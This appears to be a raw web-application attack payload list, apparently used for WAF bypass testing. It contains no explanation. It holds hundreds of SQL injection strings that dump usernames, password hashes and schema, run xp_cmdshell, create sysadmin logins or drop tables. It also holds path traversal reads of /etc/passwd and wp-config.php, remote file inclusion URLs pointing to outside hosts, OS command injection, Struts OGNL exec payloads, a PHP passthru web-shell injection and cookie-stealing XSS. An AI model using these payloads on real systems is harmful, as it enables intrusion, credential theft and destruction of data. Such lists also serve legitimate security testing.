1%' AND 7675=(SELECT 7675 FROM PG_SLEEP(5)) AND '%'='
1%' AND SLEEP(5) AND '%'='
1) AND 7675=(SELECT 7675 FROM PG_SLEEP(5)) AND (3014=3014
(SELECT (CHR(58)||CHR(114)||CHR(115)||CHR(114)||CHR(58))||(SELECT (CASE WHEN (2691=2691) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(114)||CHR(104)||CHR(114)||CHR(58)))
1' AND 9948=CONVERT(INT,(CHAR(58)+CHAR(114)+CHAR(115)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (9948=9948) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(114)+CHAR(104)+CHAR(114)+CHAR(58))) AND 'iNKU'='iNKU
1) AND 9948=CONVERT(INT,(CHAR(58)+CHAR(114)+CHAR(115)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (9948=9948) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(114)+CHAR(104)+CHAR(114)+CHAR(58))) AND (8204=8204
1%' AND 8712=8712 AND '%'='
1') AND 8712=8712 AND ('MZpM'='MZpM
1') AND 1651=1803 AND ('ZqIm'='ZqIm
/1%20and%20substring(version(),1,1)=5/
1%20and%20substring(version(),1,1)=5/
99942+union+(select+@@version,null,null,null,null,null,null,null,null,null,null,null+from+dual)
99942+union+(select+load_file('/etc/passwd'),null,null,null,null,null,null,null,null,null,null,null+from+dual)
'=' 'or'
?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','localhost:80','-0',new%20java.lang.String('$tmp$XLPhzzDNeJyhazE').replace('$','\u002f')})).start()}
w4fh4x%27%3B+exec+master..xp_cmdshell+%27ping+10.10.1.2%27--
w4fh4x%27+%3B+drop+table+temp+--
w4fh4xexec+sp_addlogin+%27name%27+%2C+%27password%27
w4fh4xexec+sp_addsrvrolemember+%27name%27+%2C+%27sysadmin%27
w4fh4xinsert+into+mysql.user+%28user%2C+host%2C+password%29+values+%28%27name%27%2C+%27localhost%27%2C+password%28%27pass123%27%29%29
w4fh4x%27+or+1%3D1+--
w4fh4x%27+union+%28select+%40%40version%29+--
w4fh4x%27+union+%28select+NULL%2C+%28select+%40%40version%29%29+--
w4fh4x%27+union+%28select+NULL%2C+NULL%2C+%28select+%40%40version%29%29+--
w4fh4x%27+union+%28select+NULL%2C+NULL%2C+NULL%2C++%28select+%40%40version%29%29+--
w4fh4x%27+union+%28select+NULL%2C+NULL%2C+NULL%2C+NULL%2C++%28select+%40%40version%29%29+--
w4fh4x%27+union+%28select+NULL%2C+NULL%2C+NULL%2C+NULL%2C++NULL%2C+%28select+%40%40version%29%29+--
w4fh4x%27%3B+if+not%28substring%28%28select+%40%40version%29%2C25%2C1%29+%3C%3E+0%29+waitfor+delay+%270%3A0%3A2%27+--
w4fh4x%27%3B+if+not%28substring%28%28select+%40%40version%29%2C25%2C1%29+%3C%3E+5%29+waitfor+delay+%270%3A0%3A2%27+---
w4fh4x%27%3B+if+not%28substring%28%28select+%40%40version%29%2C24%2C1%29+%3C%3E+1%29+waitfor+delay+%270%3A0%3A2%27+--
w4fh4x%27%3B+if+not%28select+system_user%29+%3C%3E+%27sa%27+waitfor+delay+%270%3A0%3A2%27+--
w4fh4x%27%3B+if+is_srvrolemember%28%27sysadmin%27%29+%3E+0+waitfor+delay+%270%3A0%3A2%27+--+
w4fh4x%27%3B+if+not%28%28select+serverproperty%28%27isintegratedsecurityonly%27%29%29+%3C%3E+1%29+waitfor+delay+%270%3A0%3A2%27+--
w4fh4x%27%3B+if+not%28%28select+serverproperty%28%27isintegratedsecurityonly%27%29%29+%3C%3E+0%29+waitfor+delay+%270%3A0%3A2%27+--
w4fh4x1+exec+sp_+%28or+exec+xp_%29
w4fh4x1+and+1%3D1
w4fh4x1%27+and+1%3D%28select+count%28*%29+from+tablenames%29%3B+--
w4fh4x1+or+1%3D1
w4fh4x1%27+or+%271%27%3D%271
w4fh4x1+and+user_name%28%29+%3D+%27dbo%27
w4fh4x1+and+user_name%28%29+%3D+%27dbo%27
w4fh4x%5C%27%3B+desc+users%3B+--
w4fh4x1%27+and+non_existant_table+%3D+%271
w4fh4x%27+or+username+is+not+NULL+or+username+%3D+%27
w4fh4x1+and+ascii%28lower%28substring%28%28select+top+1+name+from+sysobjects+where+xtype%3D%27u%27%29%2C+1%2C+1%29%29%29+%3E+116
w4fh4x1+union+all+select+1%2C2%2C3%2C4%2C5%2C6%2Cname+from+sysobjects+where+xtype+%3D+%27u%27+--
w4fh4x1+uni%2F**%2Fon+select+all+from+where"
w4fh4x+or+1%3D1
w4fh4x%27+or+%271%27%3D%271
w4fh4x%27%7C%7Cutl_http.request%28%27httP%3A%2F%2F192.168.1.1%2F%27%29%7C%7C%27
w4fh4x%27+%7C%7C+myappadmin.adduser%28%27admin%27%2C+%27newpass%27%29+%7C%7C+%27
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+banner+FROM+v%24version+WHERE+ROWNUM%3D1%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+SYS.LOGIN_USER+FROM+DUAL%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+SYS.DATABASE_NAME+FROM+DUAL%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+host_name+FROM+v%24instance%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+global_name+FROM+global_name%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+COUNT%28DISTINCT%28USERNAME%29%29+FROM+SYS.ALL_USERS%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+COUNT%28DISTINCT%28PASSWORD%29%29+FROM+SYS.USER%24%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+COUNT%28DISTINCT%28table_name%29%29+FROM+sys.all_tables%29%29+AND+%27i%27%3D%27ii
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+COUNT%28DISTINCT%28GRANTED_ROLE%29%29+FROM+DBA_ROLE_PRIVS+WHERE+GRANTEE%3DSYS.LOGIN_USER%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28USERNAME%29+FROM+%28SELECT+DISTINCT%28USERNAME%29%2C+ROWNUM+AS+LIMIT+FROM+SYS.ALL_USERS%29+WHERE+LIMIT%3D1%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28PASSWORD%29+FROM+%28SELECT+DISTINCT%28PASSWORD%29%2C+ROWNUM+AS+LIMIT+FROM+SYS.USER%24%29+WHERE+LIMIT%3D1%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28table_name%29+FROM+%28SELECT+DISTINCT%28table_name%29%2C+ROWNUM+AS+LIMIT+FROM+sys.all_tables%29+WHERE+LIMIT%3D1%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28column_name%29+FROM+%28SELECT+DISTINCT%28column_name%29%2C+ROWNUM+AS+LIMIT+FROM+all_tab_columns%29+WHERE+LIMIT%3D1%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28granted_role%29+FROM+%28SELECT+DISTINCT%28granted_role%29%2C+ROWNUM+AS+LIMIT+FROM+dba_role_privs+WHERE+GRANTEE%3DSYS.LOGINUSER%29+WHERE+LIMIT%3D1%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28USERNAME%29+FROM+%28SELECT+DISTINCT%28USERNAME%29%2C+ROWNUM+AS+LIMIT+FROM+SYS.ALL_USERS%29+WHERE+LIMIT%3D2%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28PASSWORD%29+FROM+%28SELECT+DISTINCT%28PASSWORD%29%2C+ROWNUM+AS+LIMIT+FROM+SYS.USER%24%29+WHERE+LIMIT%3D2%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28table_name%29+FROM+%28SELECT+DISTINCT%28table_name%29%2C+ROWNUM+AS+LIMIT+FROM+sys.all_tables%29+WHERE+LIMIT%3D2%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28column_name%29+FROM+%28SELECT+DISTINCT%28column_name%29%2C+ROWNUM+AS+LIMIT+FROM+all_tab_columns%29+WHERE+LIMIT%3D2%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28granted_role%29+FROM+%28SELECT+DISTINCT%28granted_role%29%2C+ROWNUM+AS+LIMIT+FROM+dba_role_privs+WHERE+GRANTEE%3DSYS.LOGINUSER%29+WHERE+LIMIT%3D2%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28USERNAME%29+FROM+%28SELECT+DISTINCT%28USERNAME%29%2C+ROWNUM+AS+LIMIT+FROM+SYS.ALL_USERS%29+WHERE+LIMIT%3D3%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28PASSWORD%29+FROM+%28SELECT+DISTINCT%28PASSWORD%29%2C+ROWNUM+AS+LIMIT+FROM+SYS.USER%24%29+WHERE+LIMIT%3D3%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28table_name%29+FROM+%28SELECT+DISTINCT%28table_name%29%2C+ROWNUM+AS+LIMIT+FROM+sys.all_tables%29+WHERE+LIMIT%3D3%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28column_name%29+FROM+%28SELECT+DISTINCT%28column_name%29%2C+ROWNUM+AS+LIMIT+FROM+all_tab_columns%29+WHERE+LIMIT%3D3%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28granted_role%29+FROM+%28SELECT+DISTINCT%28granted_role%29%2C+ROWNUM+AS+LIMIT+FROM+dba_role_privs+WHERE+GRANTEE%3DSYS.LOGINUSER%29+WHERE+LIMIT%3D3%29%29+AND+%27i%27%3D%27ibw4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28USERNAME%29+FROM+%28SELECT+DISTINCT%28USERNAME%29%2C+ROWNUM+AS+LIMIT+FROM+SYS.ALL_USERS%29+WHERE+LIMIT%3D4%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28PASSWORD%29+FROM+%28SELECT+DISTINCT%28PASSWORD%29%2C+ROWNUM+AS+LIMIT+FROM+SYS.USER%24%29+WHERE+LIMIT%3D4%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28table_name%29+FROM+%28SELECT+DISTINCT%28table_name%29%2C+ROWNUM+AS+LIMIT+FROM+sys.all_tables%29+WHERE+LIMIT%3D4%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28column_name%29+FROM+%28SELECT+DISTINCT%28column_name%29%2C+ROWNUM+AS+LIMIT+FROM+all_tab_columns%29+WHERE+LIMIT%3D4%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28granted_role%29+FROM+%28SELECT+DISTINCT%28granted_role%29%2C+ROWNUM+AS+LIMIT+FROM+dba_role_privs+WHERE+GRANTEE%3DSYS.LOGINUSER%29+WHERE+LIMIT%3D4%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28USERNAME%29+FROM+%28SELECT+DISTINCT%28USERNAME%29%2C+ROWNUM+AS+LIMIT+FROM+SYS.ALL_USERS%29+WHERE+LIMIT%3D5%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28PASSWORD%29+FROM+%28SELECT+DISTINCT%28PASSWORD%29%2C+ROWNUM+AS+LIMIT+FROM+SYS.USER%24%29+WHERE+LIMIT%3D5%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28table_name%29+FROM+%28SELECT+DISTINCT%28table_name%29%2C+ROWNUM+AS+LIMIT+FROM+sys.all_tables%29+WHERE+LIMIT%3D5%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28column_name%29+FROM+%28SELECT+DISTINCT%28column_name%29%2C+ROWNUM+AS+LIMIT+FROM+all_tab_columns%29+WHERE+LIMIT%3D5%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28granted_role%29+FROM+%28SELECT+DISTINCT%28granted_role%29%2C+ROWNUM+AS+LIMIT+FROM+dba_role_privs+WHERE+GRANTEE%3DSYS.LOGINUSER%29+WHERE+LIMIT%3D5%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28USERNAME%29+FROM+%28SELECT+DISTINCT%28USERNAME%29%2C+ROWNUM+AS+LIMIT+FROM+SYS.ALL_USERS%29+WHERE+LIMIT%3D6%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28PASSWORD%29+FROM+%28SELECT+DISTINCT%28PASSWORD%29%2C+ROWNUM+AS+LIMIT+FROM+SYS.USER%24%29+WHERE+LIMIT%3D6%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28table_name%29+FROM+%28SELECT+DISTINCT%28table_name%29%2C+ROWNUM+AS+LIMIT+FROM+sys.all_tables%29+WHERE+LIMIT%3D6%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28column_name%29+FROM+%28SELECT+DISTINCT%28column_name%29%2C+ROWNUM+AS+LIMIT+FROM+all_tab_columns%29+WHERE+LIMIT%3D6%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28granted_role%29+FROM+%28SELECT+DISTINCT%28granted_role%29%2C+ROWNUM+AS+LIMIT+FROM+dba_role_privs+WHERE+GRANTEE%3DSYS.LOGINUSER%29+WHERE+LIMIT%3D6%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28USERNAME%29+FROM+%28SELECT+DISTINCT%28USERNAME%29%2C+ROWNUM+AS+LIMIT+FROM+SYS.ALL_USERS%29+WHERE+LIMIT%3D7%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28PASSWORD%29+FROM+%28SELECT+DISTINCT%28PASSWORD%29%2C+ROWNUM+AS+LIMIT+FROM+SYS.USER%24%29+WHERE+LIMIT%3D7%29%29+AND+%27i%27%3D%27ii
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28table_name%29+FROM+%28SELECT+DISTINCT%28table_name%29%2C+ROWNUM+AS+LIMIT+FROM+sys.all_tables%29+WHERE+LIMIT%3D7%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28column_name%29+FROM+%28SELECT+DISTINCT%28column_name%29%2C+ROWNUM+AS+LIMIT+FROM+all_tab_columns%29+WHERE+LIMIT%3D7%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28granted_role%29+FROM+%28SELECT+DISTINCT%28granted_role%29%2C+ROWNUM+AS+LIMIT+FROM+dba_role_privs+WHERE+GRANTEE%3DSYS.LOGINUSER%29+WHERE+LIMIT%3D7%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28USERNAME%29+FROM+%28SELECT+DISTINCT%28USERNAME%29%2C+ROWNUM+AS+LIMIT+FROM+SYS.ALL_USERS%29+WHERE+LIMIT%3D8%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28PASSWORD%29+FROM+%28SELECT+DISTINCT%28PASSWORD%29%2C+ROWNUM+AS+LIMIT+FROM+SYS.USER%24%29+WHERE+LIMIT%3D8%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28table_name%29+FROM+%28SELECT+DISTINCT%28table_name%29%2C+ROWNUM+AS+LIMIT+FROM+sys.all_tables%29+WHERE+LIMIT%3D8%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28column_name%29+FROM+%28SELECT+DISTINCT%28column_name%29%2C+ROWNUM+AS+LIMIT+FROM+all_tab_columns%29+WHERE+LIMIT%3D8%29%29+AND+%27i%27%3D%27i
w4fh4x%27+AND+1%3Dutl_inaddr.get_host_address%28%28SELECT+DISTINCT%28granted_role%29+FROM+%28SELECT+DISTINCT%28granted_role%29%2C+ROWNUM+AS+LIMIT+FROM+dba_role_privs+WHERE+GRANTEE%3DSYS.LOGINUSER%29+WHERE+LIMIT%3D8%29%29+AND+%27i%27%3D%27i
w4fh4x%27%7C%7C%28elt%28-3%2B5%2Cbin%2815%29%2Cord%2810%29%2Chex%28char%2845%29%29%29%29
w4fh4x%27%7C%7C%276
w4fh4x%28%7C%7C6%29
w4fh4x%27+or+1%3D1--+
w4fh4xor+1%3D1
w4fh4x%27+or+%271%27%3D%271
w4fh4x%3B+or+%271%27%3D%271%27
w4fh4x%22+or+isNULL%281%2F0%29+%2F*
w4fh4x%27+or+%277659%27%3D%277659
w4fh4x%22+or+isNULL%281%2F0%29+%2F*
w4fh4x%27+--+
w4fh4x%27+or+1%3D1--
w4fh4x%22+or+1%3D1--
w4fh4x%27+or+1%3D1+%2F*
w4fh4xor+1%3D1--
w4fh4x%27+or+%27a%27%3D%27a
w4fh4x%22+or+%22a%22%3D%22a
w4fh4x%27%29+or+%28%27a%27%3D%27a
w4fh4xadmin%27+or+%27
w4fh4x%27+select+*+from+information_schema.tables--
w4fh4x%29+union+select+*+from+information_schema.tables%3B
w4fh4x%27+having+1%3D1--estwaf;2=joxy%27%20and%20%20sELECT%20/*!32302%201/0,%20*/%201%20FROM%20testwaf;cf.destr0y.net/poc.php?searchw4fh4x' SELECT foo FROM users--
w4fh4x%27%20GROUP%20BY%20testwaf.testzsl%20HAVING%201=1%20--
w4fh4x%27;%20IF%20%28SELECT%20*%20FROM%20login%29%20BENCHMARK%281000000,MD5%281%29%29#
w4fh4x%27+union+select+benchmark%28500000,sha1%20%280x414141%29%29,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
test%27aa%27%20LIKE%20md5%281%29%20or%20%271
test%27+union+select+load_file%280x63...%29,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
%27%20or%2F*!%201%3D1*%2F%97%20%20%201%27UNION/*%210SELECT%20user%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9/*%210from/*%210mysql.user/*--
textv%27%20AND%20ASCII%28LOWER%28SUBSTRING%28%28SELECT%20TOP%201%20name%20FROM%20sysobjects%20WHERE%20xtype=%27U%27%29,%201,%201%29%29%29%20%3E%20116
textv%27union%20all%20select%20all%20%60delcoang_zslwaf%60%20from%60information_schema%60.%20%60tables%60
ttt%91union%28select%281%29,tabe_name,%283%29from%60information_schema%60.%60tables%60%29#
admin%27+AND+1%3D1%23&clave=password&captcha=vhw3admin%27+++++++++++++++++++++++++and++++++++++++++++++++++1++++++++++++++++++++++++++%3D+++++++++++++++++++++++1%23&clave=test&captcha=czq5admin%27+AND%2F*comment1*%2F1%2F*comment2*%2F%3D%2F*comment3*%2F1%23&clave=test&captcha=7uve
%61%64%6D%69%6E%27%20%61%6E%64%20%31%3D%31%23&clave=test&captcha=tbc7
admin%27+%2F*%21+or+*%2F+1%3D1--+-&clave=admin&captcha=f8gp
admin%27+and+%27a%27%3D%27a%27%23&clave=test&captcha=p2i7
admin%27+and+%27t00t%27+%3D+%27t00t%27%23&clave=admin&captcha=32cp
admin%27+AND%2F*comment1*%2F1%2F*comment2*%2F%26%2361%3B%2F*comment3*%2F1%23&clave=blaa&captcha=3ybg
admin%27+AND+0x2e+REGEXP+0x2e%23&clave=blaster&captcha=xup4
admin%27+and+%27%2528%27+%26%2361%3B+%27%2528%27%23&clave=addd&captcha=bit7
admin%2527&clave=password&captcha=g5zi
admin%27+and+1%25253d1%23&clave=test&captcha=tnn4
admin%27+AND+230984752+%26%2361%3B+230984752%23&clave=test&captcha=9wnf
admin%27+%2520%2520%2520%2520%2520%2520%2520%2520%2520AND%2520%2520%2520%2520%2520%2520%2520%2520%26%2361%3B%2520%2520%2520%2520%2520%2520%2520%25201%23&clave=dsdsd&captcha=smcr
http://cf.destr0y.net/list/admin/index.php?p=/info.php?
?cmd2=http://zeroscience.mk/pentest/tim.php
?cmd2=/etc/hosts
?cmd2=///etc///hosts
?cmd2=../../etc/hosts
?cmd2=%2F%2F%2Fetc%2F%2F%2Fhosts
?cmd2=?cmd2=../../etc/hosts :)
?cmd=cat+/etc/passwd
?cmd=cat%20//etc//passwd
?cmd=cat%20\//etc\//passwd
?cmd=uname%20-a
?cmd=ps%20-aux
?cmd=ps+-aux
?cmd=cat%20/etc/passwd%20|%20grep%20root
?cmd=cat%20/etc/passwd
?file=/etc/%20%20%20%20%20/passwd%20%20%20%20%20&op=fileviewer
?file=%20%20%20%20%20//etc//passwd%20%20%20%20%20&op=fileviewer
?file=///etc///passwd&op=fileviewer
?file=\///..\///..\//etc\//passwd&op=fileviewer
?file=//etc//passwd&op=fileviewer
?file=///etc////passwd&op=fileviewer
?file=%2F%2F%2Fetc%2F%2F%2F%2Fpasswd&op=fileviewer
?file=..//..//..//etc//passwd&op=fileviewer
?file=///..//..///etc//passwd&op=fileviewer
?file=%2F%2F%2F..%2F%2F..%2F%2F%2Fetc%2F%2Fpasswd&op=fileviewer
?op=fileviewer&file=/var/www/wp/wp-config.php
?file=/etc/passwd&op=fileviewer
?file=\/etc\/passwd&op=fileviewer
?file=\/\/\/etc\/\/\/passwd&op=fileviewer
?file=\\\\\\\\\\\\\/etc\////////////////passwd&op=fileviewer
?file=%5c/etc%5c/passwd&op=fileviewer (url)
?file=%2Fetc%2Fpasswd&op=fileviewer (url)
?file=%2F%65%74%63%2F%70%61%73%73%77%64&op=fileviewer (hex)
?file=\%00/etc\%00/passwd&op=fileviewer
?cmd2=../../../../..//home/zslab/public_html/incapsula/.htaccess
/nucleus3.61/action.php?DIR_LIBS=http://cf.destr0y.net/info.php????????
?p=/info.php?
?p=HTTP:%2f%2fcf.destr0y.net/info.php?
?cmd2=http://elgringodelanoche.com/c.txt%00
?file=///..//..///etc//passwd&op=fileviewer
?file=..//..//..//etc//passwd&op=fileviewer
?file=%2F%2F%2F..%2F%2F..%2F%2F%2Fetc%2F%2Fpasswd&op=fileviewer
?file=/etc//passwd&op=fileviewer
?file=//etc//passwd&op=fileviewer
?file=\//etc\//passwd&op=fileviewer
?file=%2F%2Fetc%2F%2Fpasswd&op=fileviewer
?file=%2F%2F%65%74%63%2F%2F%70%61%73%73%77%64&op=fileviewer
?file=%252fetc%252fpasswd&op=fileviewer
?file=/etc/%20%20%20%20%20/passwd%20%20%20%20%20&op=fileviewer
?file=%20%20%20%20%20//etc//passwd%20%20%20%20%20&op=fileviewer
?file=///etc////passwd&op=fileviewer
?file=%2F%2F%2Fetc%2F%2F%2F%2Fpasswd&op=fileviewer
?file=%2F%2F%65%74%63%2F%2F%70%61%73%73%77%64&op=fileviewer
?action:%25{Runtime.getRuntime%28%29.exec%28%22mkdir%20/tmp/WTFFF%22%29}
/wp/wpcontent/plugins/timthumb/timthumb.php?src=http://zeroscience.mk/pentest/tim.php
/wp/wpcontent/plugins/timthumb/timthumb.php?src=http://zeroscience.mk/pentest/tim.php???????
?src=http://zeroscience.mk/pentest/tim.php
?src=http://zeroscience.mk/pentest/tim.php???????
?cmd=id;pwd;ls -al- <input type="hidden" name="db_host" value="'; }assthru($_GET['cmd']); /*">
?cmd2=../../.././../../home/zslab/.bash_history
?cmd2=/info.php? (captcha)
?op=fileviewer&file=/var/www/wp/wp-config.php
?x=%3Cform%20id=test%20onforminput=alert(1)%3E%3Cinput%3E%3C/form%3E%3Cbutton%20form=test%20onformchange=alert(2)%3EX%3C/button%3E
?x=%3Cform%20id=%22test%22%3E%3C/form%3E%3Cbutton%20form=%22test%22%20formaction=%22javascript:alert%281%29%22%3EX%3C/button%3E
=admin%27+++++++++++++++++++++++++and++++++++++++++++++++++1++++++++++++++++++++++++++%3D+++++++++++++++++++++++1%23&clave=test&captcha=czq5
=admin%27+AND%2F*comment1*%2F1%2F*comment2*%2F%3D%2F*comment3*%2F1%23&clave=test&captcha=7uve
=%61%64%6D%69%6E%27%20%61%6E%64%20%31%3D%31%23&clave=test&captcha=tbc7
=admin%27+%2F*%21+or+*%2F+1%3D1--+-&clave=admin&captcha=f8gp
=admin%27+and+%27a%27%3D%27a%27%23&clave=test&captcha=p2i7
=admin%27+and+%27t00t%27+%3D+%27t00t%27%23&clave=admin&captcha=32cp
=admin%27+AND%2F*comment1*%2F1%2F*comment2*%2F%26%2361%3B%2F*comment3*%2F1%23&clave=blaa&captcha=3ybg
=admin%27+AND+0x2e+REGEXP+0x2e%23&clave=blaster&captcha=xup4
=admin%27+and+%27%2528%27+%26%2361%3B+%27%2528%27%23&clave=addd&captcha=bit7
=admin%2527&clave=password&captcha=g5zi
=admin%27+and+1%25253d1%23&clave=test&captcha=tnn4
=admin%27+AND+230984752+%26%2361%3B+230984752%23&clave=test&captcha=9wnf
=admin%27+%2520%2520%2520%2520%2520%2520%2520%2520%2520AND%2520%2520%2520%2520%2520%2520%2520%2520%26%2361%3B%2520%2520%2520%2520%2520%2520%2520%25201%23&clave=dsdsd&captcha=smcr
=admin' and '%28' &#61; '%28'#&clave=password&captcha=b5dt
?action:%25{Runtime.getRuntime%28%29.exec%28%22mkdir%20/tmp/WTFFF%22%29}
?x=%3Cform%20id=test%20onforminput=alert(1)%3E%3Cinput%3E%3C/form%3E%3Cbutton%20form=test%20onformchange=alert(/XSS/)%3EX%3C/button%3E
gzip, deflate"><script>alert(1);</script>
admin' AND 230984752 &#61; 230984752#
id;pwd
"><!--mfunc eval(base64_decode(cGhwaW5mbygpOyAg)); --><!--/mfunc-->
notifications=dasdsa' union select* from testwaf;#
segment=http://zeroscience.mk/pentest/tim.php
market=uname -a;
hallo=J0xy0L </h2><script>alert(document.cookie)</script>
"1 AND SLEEP(15)"
admin%27+AND+1%3D1%23
?p=http://in.zeroscience.mk/info.php?
?file=/etc/passwd
?cmd=ls%20-la;%20id;%20pwd;cat%20/etc/passwd
"'; } passthru($_GET['cmd']); /*"
./?directory=./&search=..%c0%af 
./&gosearch='"\'\");|]*{%0d%0a<%00>%bf%27' 
'"\'\");|]*{%0d%0a<%00>%bf%27'
../.htaccess
%0d%0a%20FakeHeader%3a%20WriteYourOwnHeader
)(&))
%29%28%26%29%29
..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\
'(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)-1 union select 1,0,0,0,0,0,0,0,0,0,0,%s,0,0,0,0,0,0,0,0,0,0,0#
<?php phpinfo(); ?>
value'union+select+UTL_INADDR.get_host_address,null,null,null,null+from+dual--
value'union+select+global_name,null,null,null,null+from+tables--
value'union+select+global_name,null,null,null,null+from+global_name--
value'union+select+user,null,null,null,null+from+dual--
?ERROR_NBR=0%20AND%200%20IN%20(SELECT%20SLEEP(5))%20--%20
0%20AND%200%20IN%20(SELECT%20SLEEP(5))%20--%20
%2527=0# 
%27=0# 
'=0# 
3+UNION SELECT1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--
-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--
+(SELECT 1 FROM (SELECT SLEEP(25))A)
+(SELECT 1 FROM (SELECT SLEEP(25))A)+
